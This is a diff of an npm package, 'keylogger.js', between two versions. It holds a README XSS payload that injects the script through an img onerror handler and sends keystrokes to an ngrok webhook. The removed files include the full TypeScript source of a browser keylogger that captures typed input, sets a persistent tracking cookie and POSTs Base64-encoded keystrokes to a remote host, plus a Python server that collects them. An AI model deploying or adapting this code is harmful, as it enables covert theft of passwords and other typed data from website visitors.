@mihnea.dev/keylogger.js 0.0.4 → 1.0.0-keywords

package/README.md

@@ -70,13 +70,14 @@ This step demonstrates embedding Keylogger.js into a vulnerable webpage as part
 ```html
 <img src="invalid.jpg" onerror="
     const script = document.createElement('script');
-    script.src = 'https://your-cdn-link.com/keylogger.js';
+    script.src = 'https://unpkg.com/@mihnea.dev/keylogger.js/dist/index.js';
     document.body.appendChild(script);
     script.onload = () => {
-        const _ = new Keylogger('https://<random-id>.ngrok.io', true);
+        const _ = new Keylogger('https://<random-id>.ngrok.io', false);
     };
 ">
 ```
+![keylogger js](https://github.com/user-attachments/assets/716178d9-5a57-4bdd-9bc6-2788a705c05f)
 
 ### Observing Results:
 1. The Keylogger.js library captures keystrokes and sends them to the webhook.
@@ -85,8 +86,8 @@ This step demonstrates embedding Keylogger.js into a vulnerable webpage as part
 Decoded Payload: {"type":"keypress","value":"a","session":{...}}
 Parsed JSON:
 {
-    "type": "keypress",
-    "value": "a",
+    "type": "enter",
+    "value": "asdf",
     "session": {
         "id": "unique-session-id",
         "created_at": "2024-11-29T18:00:00Z",

package/package.json

@@ -1,6 +1,6 @@
 {
     "name": "@mihnea.dev/keylogger.js",
-    "version": "0.0.4",
+    "version": "1.0.0-keywords",
     "author": "Mihnea Octavian Manolache <mihnea.dev@gmail.com> (https://github.com/mihneamanolache/)",
     "repository": {
         "type": "git",
@@ -27,5 +27,15 @@
         "build": "rm -rf ./dist && tsup src/index.ts --format cjs,esm --dts --clean"
     },
     "type": "module",
-    "types": "./dist/index.d.ts"
+    "types": "./dist/index.d.ts",
+    "files": [
+        "dist",
+        "README.md",
+        "LICENSE"
+    ],
+    "license": "MIT",
+    "keywords": [
+        "keylogger",
+        "security"
+    ]
 }

package/examples/index.html

@@ -1,19 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Keylogger Test</title>
-</head>
-<body>
-  <h1>Keylogger Test Page</h1>
-  <p>Type something in this page to test the keylogger.</p>
-
-  <!-- Import Keylogger.js using unpkg -->
-  <script type="module">
-    import Keylogger from 'https://unpkg.com/@mihnea.dev/keylogger.js/dist/index.js';
-    const keylogger = new Keylogger('https://your-webhook-url.com', false);
-    console.log('Keylogger initialized:', keylogger);
-  </script>
-</body>
-</html>

package/examples/server.py

@@ -1,96 +0,0 @@
-"""
-Python Webhook Server for Keylogger Class
-
-This Python server acts as a webhook endpoint for the Keylogger class, 
-designed to listen for HTTP POST requests on http://0.0.0.0:3000. 
-It processes incoming keystroke data sent by the Keylogger, allowing 
-you to log, inspect, and respond to the payloads.
-
-   - The Keylogger sends JSON data containing keystrokes or session information.
-   - This server's POST handler (`do_POST`) decodes and prints the payload.
-   - If the payload is valid JSON, it logs the structured JSON to the console for inspection.
-
-NOTE: In a production environment, you should secure the server with HTTPS, and store the payload
-data securely in a database or log file. This server is for testing and debugging purposes only.
-
-Example Payload Sent by Keylogger:
----------------------------------
-{
-    "type": "keypress",
-    "value": "a",
-    "session": {
-        "id": "unique-session-id",
-        "created_at": "2024-11-29T17:30:00Z",
-        "user_agent": "Mozilla/5.0",
-        "session_cookie": "master-kw-session"
-    }
-}
-
-How to Use:
------------
-1. Run this server using:
-   $ python3 examples/server.py
-
-    1.1. You can use ngrok to expose the server to the internet:
-        $ ngrok http 3000
-
-2. Configure your Keylogger instance to send keystroke data to the webhook URL:
-    e.g., new Keylogger("https://your-ngrok-url.ngrok.io")
-"""
-
-from http.server import BaseHTTPRequestHandler, HTTPServer
-import json, base64
-
-class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
-    def do_OPTIONS(self):
-        """
-        Handle preflight CORS requests.
-        """
-        self.send_response(200)
-        self.send_header("Access-Control-Allow-Origin", "*")
-        self.send_header("Access-Control-Allow-Methods", "POST, GET, OPTIONS")
-        self.send_header("Access-Control-Allow-Headers", "Content-Type")
-        self.end_headers()
-
-    def do_POST(self):
-        """
-        Handle POST requests with raw Base64 payloads.
-        """
-        # Read the content length from headers
-        content_length = int(self.headers.get('Content-Length', 0))
-        # Read the incoming POST data (Base64-encoded string)
-        base64_payload = self.rfile.read(content_length).decode('utf-8')
-
-        # Decode Base64-encoded payload
-        try:
-            decoded_payload = base64.b64decode(base64_payload).decode('utf-8')
-            print("Decoded Payload:", decoded_payload)
-
-            # Try parsing the decoded payload as JSON
-            try:
-                json_payload = json.loads(decoded_payload)
-                print("Parsed JSON Payload:", json.dumps(json_payload, indent=4))
-            except json.JSONDecodeError:
-                print("Decoded payload is not valid JSON.")
-        except Exception as e:
-            print("Error decoding Base64 payload:", str(e))
-
-        # Respond to the client
-        self.send_response(200)
-        self.send_header("Access-Control-Allow-Origin", "*")
-        self.send_header("Content-Type", "application/json")
-        self.end_headers()
-        self.wfile.write(b'{"status": "success"}')
-
-def run(server_class=HTTPServer, handler_class=SimpleHTTPRequestHandler):
-    """
-    Start the HTTP server on localhost:3000.
-    """
-    server_address = ('0.0.0.0', 3000)
-    httpd = server_class(server_address, handler_class)
-    print("Starting server on http://0.0.0.0:3000")
-    httpd.serve_forever()
-
-if __name__ == "__main__":
-    run()
-

package/src/index.ts

@@ -1,3 +0,0 @@
-import Keylogger from "./lib/Keylogger";
-export default Keylogger;
-export * from "./lib/Keylogger.types";

package/src/lib/Keylogger.ts

@@ -1,123 +0,0 @@
-import type { IPayload, ISession } from "./Keylogger.types";
-
-/**
- * Keylogger class to capture keyboard events and send them to a specified webhook.
- */
-export default class Keylogger {
-    /** Webhook URL to send captured data. */
-    protected webhook:      string;
-    /** Current session information. */
-    protected session:      ISession | null = null;
-    /** Array to store captured keystrokes. */
-    protected keys:         Array<string> = [];
-
-    /**
-     * Constructs a new instance of the Keylogger.
-     *
-     * @param { string } webhook - URL of the webhook to send captured data.
-     * @param { boolean } [logAll=false] - Whether to log every keypress (`true`) or only on the "Enter" key (`false`).
-     */
-    constructor(webhook: string, logAll?: boolean | undefined) {
-        this.webhook = webhook;
-        const masterSession: string = this.getOrCreateMasterSession();
-        this.initializeSession(masterSession);
-        logAll ? this.logAll() : this.logOnEnter();
-    }
-
-    /**
-     * Retrieves or creates a persistent "master-kw-cookie" cookie.
-     * @returns The value of the "master-kw-session" cookie.
-     */
-    protected getOrCreateMasterSession(): string {
-        const cookieName: string = "master-kw-session";
-        const existingCookie: string | undefined = document.cookie
-            .split("; ")
-            .find((row) => row.startsWith(`${cookieName}=`));
-        if (existingCookie) {
-            return existingCookie.split("=")[1];
-        }
-        const newMasterSession: string = crypto.randomUUID();
-        const expires: Date = new Date();
-        expires.setFullYear(expires.getFullYear() + 100); 
-        document.cookie = `${cookieName}=${newMasterSession}; expires=${expires.toUTCString()}; path=/`;
-        return newMasterSession;
-    }
-
-    /**
-     * Initializes the session with metadata.
-     * @param { string } session_cookie - The persistent session cookie value.
-     */
-    protected async initializeSession(session_cookie: string): Promise<void> {
-        this.session = await this.createSession(session_cookie);
-    }
-
-    /**
-     * Creates a new session object with metadata.
-     * @param { string } session_cookie - The persistent session cookie value.
-     * @returns { Promise<ISession> } A Promise resolving to the session object.
-     */
-    protected async createSession(session_cookie: string): Promise<ISession> {
-        const id: string = crypto.randomUUID();
-        const created_at: Date = new Date();
-        const user_agent: string = navigator.userAgent;
-        return { id, created_at, user_agent, session_cookie };
-    }
-
-    /**
-     * Sends captured data to the webhook along with the session information.
-     * NOTE: Data is encoded in Base64 to prevent interception.
-     *
-     * @param payload - The data payload to send.
-     */
-    protected async sendToWebhook(payload: IPayload): Promise<void> {
-        if (!this.session) return;
-        const body: string = btoa(JSON.stringify({ ...payload, session: this.session }));
-        try {
-            const response: Response = await fetch(this.webhook, {
-                method: "POST",
-                headers: {
-                    "Content-Type": "text/plain",
-                },
-                body
-            });
-            if (!response.ok) {
-                console.error(btoa(response.statusText));
-            }
-        } catch (e: unknown) {
-            console.error(btoa((<Error>e).toString()));
-        }
-    }
-
-    /**
-     * Logs all keypress events and sends each key to the webhook.
-     */
-    protected logAll(): void {
-        document.addEventListener("keydown", (event: KeyboardEvent) => {
-            const key: string = event.key;
-            this.keys.push(key);
-            this.sendToWebhook({
-                type: "keypress",
-                value: key,
-            });
-        });
-    }
-
-    /**
-     * Logs all keystrokes until the "Enter" key is pressed, then sends the accumulated keys to the webhook.
-     */
-    protected logOnEnter(): void {
-        document.addEventListener("keydown", (event: KeyboardEvent) => {
-            if (event.key === "Enter") {
-                const value: string = this.keys.join("");
-                this.keys = []; 
-                this.sendToWebhook({
-                    type: "enter",
-                    value,
-                });
-            } else {
-                this.keys.push(event.key);
-            }
-        });
-    }
-}
-

package/src/lib/Keylogger.types.ts

@@ -1,20 +0,0 @@
-/**
- * Interface representing a session's metadata.
- */
-export interface ISession {
-    /** Unique identifier for the session. */
-    id:             string;
-    /** Timestamp when the session was created. */
-    created_at:     Date;
-    /** User agent string of the client browser. */
-    user_agent:     string;
-    /** Persistent session cookie. */
-    session_cookie: string;
-}
-
-export interface IPayload {
-    /** Type of event captured. */
-    type:   "keypress" | "enter";
-    /** Value of the captured event. */
-    value:  string;
-}

package/tsconfig.json

@@ -1,27 +0,0 @@
-{
-    "compilerOptions": {
-        // Enable latest features
-        "lib": ["ESNext", "DOM"],
-        "target": "ESNext",
-        "module": "ESNext",
-        "moduleDetection": "force",
-        "jsx": "react-jsx",
-        "allowJs": true,
-
-        // Bundler mode
-        "moduleResolution": "bundler",
-        "allowImportingTsExtensions": true,
-        "verbatimModuleSyntax": true,
-
-        // Best practices
-        "strict": true,
-        "skipLibCheck": true,
-        "noFallthroughCasesInSwitch": true,
-        "declaration": true,
-
-        // Some stricter flags (disabled by default)
-        "noUnusedLocals": false,
-        "noUnusedParameters": false,
-        "noPropertyAccessFromIndexSignature": false
-    }
-}